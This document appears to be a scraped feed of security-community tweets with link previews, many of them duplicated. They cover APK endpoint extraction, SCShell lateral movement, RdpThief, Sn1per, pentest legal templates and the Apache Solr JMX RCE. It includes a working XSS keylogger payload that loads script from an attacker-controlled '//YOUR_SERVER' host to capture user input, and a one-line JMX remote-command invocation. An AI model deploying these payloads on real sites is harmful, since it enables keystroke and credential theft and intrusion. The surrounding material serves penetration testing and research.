Target has an android app?
1. Download it
2. Use Diggy (https://t.co/qp3LIHZRge) to extract URLs
3. Use Arjun (https://t.co/Y02eaYsbow) to find parameters on those URLs
1. Download it
2. Use Diggy (https://t.co/qp3LIHZRge) to extract URLs
3. Use Arjun (https://t.co/Y02eaYsbow) to find parameters on those URLs
GitHub
s0md3v/Diggy
Extract endpoints from apk files. Contribute to s0md3v/Diggy development by creating an account on GitHub.
Remote XSS Keylogger:
Payload: <svg/onload=setTimeout(function(){d=document;z=d.createElement("script");z.src="//YOUR_SERVER/keylogger.js";d.body.appendChild(z)},0)>
This will log a user's input to your remote server.
keylogger.php: https://t.co/PwIvyt9Uss
keylogger.js: https://t.co/g5HoTeA5z2
Payload: <svg/onload=setTimeout(function(){d=document;z=d.createElement("script");z.src="//YOUR_SERVER/keylogger.js";d.body.appendChild(z)},0)>
This will log a user's input to your remote server.
keylogger.php: https://t.co/PwIvyt9Uss
keylogger.js: https://t.co/g5HoTeA5z2
Pastebin
[PHP] <?php if (!empty($_GET['c'])) { $f = fopen("log.txt", "a+"); fwrite($ - Pastebin.com
Interesting way to move laterally using the service manager without registering a service or writing a file to disk.
C# and Powershell version will be release soon.
https://t.co/ZGA78JFJxQ
Thanks to ChangeServiceConfigA
C# and Powershell version will be release soon.
https://t.co/ZGA78JFJxQ
Thanks to ChangeServiceConfigA
GitHub
Mr-Un1k0d3r/SCShell
Fileless lateral movement tool that rely on ChangeServiceConfigA to run command - Mr-Un1k0d3r/SCShell
#checkra1n beta 0.9.3 is out with significant improvements - get it at https://t.co/MqMSSonazH
Use it to search for TLS certificates in the IPv4 space 🔍
https://t.co/YVeyCcM1El
https://t.co/YVeyCcM1El
Reminder for those asking me how to get started, this is one of the repos you will find a lot of info you need. It's overwhelming. Make a list of skills you want to learn and focus on one each. https://t.co/Dnhng9e4Kk
list of ctf sites on my site here:
https://t.co/9YboEtLmz2
list of ctf sites on my site here:
https://t.co/9YboEtLmz2
GitHub
Hack-with-Github/Awesome-Hacking
A collection of various awesome lists for hackers, pentesters and security researchers - Hack-with-Github/Awesome-Hacking
POC, RemoteViewing, to demo RDP credential theft (adapted from @0x09AL post => https://t.co/sUhkZ7asOR) using EasyHook and Donut ☠️🖥️. More details on GitHub => https://t.co/bRXrFOR7Zu
www.mdsec.co.uk
RdpThief: Extracting Clear-text Credentials from Remote Desktop Clients – MDSec
Sn1per v7.4 Released! New exploits (shoutout @D0rkerDevil), virtual host scanning, several new OSINT checks, various fixes + more! https://t.co/Z4NUaXRieP
GitHub
1N3/Sn1per
Automated pentest framework for offensive security experts - 1N3/Sn1per
Open sourced legal documentation used for physical penetration tests.
The purpose is to help the community and organizations protect their employees when conducting testing.
Includes three docs:
MSA
SOW
Authorization Letter
https://t.co/Tco6WuuuaU
The purpose is to help the community and organizations protect their employees when conducting testing.
Includes three docs:
MSA
SOW
Authorization Letter
https://t.co/Tco6WuuuaU
GitHub
trustedsec/physical-docs
This is a collection of legal wording and documentation used for physical security assessments. The goal is to hopefully allow this as a template for other companies to use and to protect themselve...
Helpful info on making Firefox stop polluting your Burp session with superfluous requests:
https://t.co/93MP5jRH2s
https://t.co/93MP5jRH2s
Black Hills Information Security
Towards a Quieter Firefox - Black Hills Information Security
Brian King // On a recent webapp test, I got a little frustrated with all the extra HTTP requests showing up in my Burpsuite Proxy History from connections that Firefox was making on its own. I was having to scroll around way more than I used to while trying…
CVE-2019-12409: Apache Solr RCE vulnerability due to bad config default (JMX ) https://t.co/xQCOw10eD0
jython https://t.co/vkuiUeaCT2 xxx 18983 command super_secret "ls -la"
https://t.co/WkAdM31DMz
jython https://t.co/vkuiUeaCT2 xxx 18983 command super_secret "ls -la"
https://t.co/WkAdM31DMz
MOGWAI LABS GmbH web site
Attacking RMI based JMX services
An attack primer on how to hack into RMI based JMX services